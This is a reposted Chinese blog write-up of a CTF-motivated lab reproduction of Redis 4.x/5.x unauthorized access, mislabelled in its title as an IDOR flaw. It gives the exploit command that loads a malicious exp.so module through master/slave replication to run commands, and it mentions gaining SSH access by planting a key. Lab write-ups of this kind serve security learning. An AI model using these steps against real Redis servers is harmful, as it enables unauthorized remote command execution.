Redis 4.x/5.x IDOR漏洞复现[通俗易懂]

Redis 4.x/5.x IDOR漏洞复现[通俗易懂]Redis4.x/5.x未授权访问漏洞Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。漏洞复现最近碰到ctf的题目是通过ssrf和redis的未授权访问打入内网getshell,想着用docker复现以下此漏洞。拉取环境开启环境后,如图使用redis-cli-hyour-ipj即可连接redis数据库,并且可以清空所有数据,即有未授权访问漏洞使用poc实现远程命令执行先将下载好的poc目录下

大家好,又见面了,我是你们的朋友全栈君。

Redis 4.x/5.x 未授权访问漏洞

Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。

漏洞复现

最近碰到ctf的题目是通过ssrf和redis的未授权访问打入内网getshell,想着用docker复现以下此漏洞。

拉取环境开启环境后,如图

在这里插入图片描述

使用redis-cli -h your-ipj即可连接redis数据库,并且可以清空所有数据,即有未授权访问漏洞

使用poc实现远程命令执行

在这里插入图片描述

先将下载好的poc目录下的redismoudleSDK进行编译

在这里插入图片描述

但是即使进行编译之后还是会报错,因为没有装redis-cli

因为之前ubantu靶机装了但是kali没有装(后来发现并没有影响仔细找错甚至看了整个脚本)原来是我的8888端口号被占用了执行不了

在这里插入图片描述

python3 redis-master.py -r 192.168.11.147 -p 6379 -L 192.168.11.129 -p 8888 -f RedisModulesSDK/exp.so -c “id”
从而实现命令执行

此外还有一种方法就是利用ssh密钥

使用我的kali对ssh生成一个空密码,将密钥传输到靶机即redis上,然后可以使用ssh免密登录。

至此复现完成

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/134445.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • Django(37)配置django日志[通俗易懂]

    Django(37)配置django日志[通俗易懂]前言django框架的日志通过python内置的logging模块实现的,既可以记录自定义的一些信息描述,也可以记录系统运行中的一些对象数据,还可以记录包括堆栈跟踪、错误代码之类的详细信息。log

  • WebRTC直播技术方案「建议收藏」

    WebRTC直播技术方案「建议收藏」我们都知道,WebRTC是面向互联网的一种即时通信标准,由于被Chrome、火狐、Safari等主流浏览器支持,并提供了一致和简洁的API,使得开发WebRTC的视频通信应用非常简单和流行。在大多数情况下,我们认为双向视频通信技术和视频直播技术是两种不同的技术,一个做视频通话,一个做单向直播(在以往的直播方案中,绝大部分是采用rtmp协议做直播上行的)。有没有可能使用WebR…

  • 括号匹配问题 栈c语言(c语言栈实现括号匹配)

    例如:{}[()]、{[()]}、()[]{}这种大中小括号成对出现(位置不限)则为括号匹配,反之则不匹配,如{()[接下来看一下实现方式栈的定义以及相关操作//栈的定义typedefstruct{ charelem[stack_size]; inttop;}seqStack;//栈的初始化voidinitStack(seqStack*s){ s->top=-…

  • 杂学--变量命名神器CODELF的学习和使用

    杂学--变量命名神器CODELF的学习和使用ThereareonlytwohardthingsinComputerScience:cacheinvalidationandnamingthings.             --PhilKarlton一、前言最近关注了一下”掘金”这个技术网站,发现里面有好多好玩的知识和小工具的介绍,今天看到一个叫codeif的工具。原文链接:https://juejin.im/

  • qtabwidget 高度,QTabWidget的大小取决于当前选项卡[通俗易懂]

    qtabwidget 高度,QTabWidget的大小取决于当前选项卡[通俗易懂]I’veaQTabWidget,whichcontainswidgetsofdifferentheights(theirwidthsarefixed),however,thedefaultimplementationofQTabWidgetselectsthebiggestwidget’sheightasownheight.WhatIwould…

  • PyCharm安装步骤_jupyter运行py文件

    PyCharm安装步骤_jupyter运行py文件这里写自定义目录标题关于如何在pycharm安装jupyter关于如何在pycharm安装jupyterwindows+r打开命令窗口输入cmd使用如下命令(C:\Users\dd\PicturesDUPJ(18RS(4.输入jupyternotebook,把下面框出现的路径复制5.下图,然后ok…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号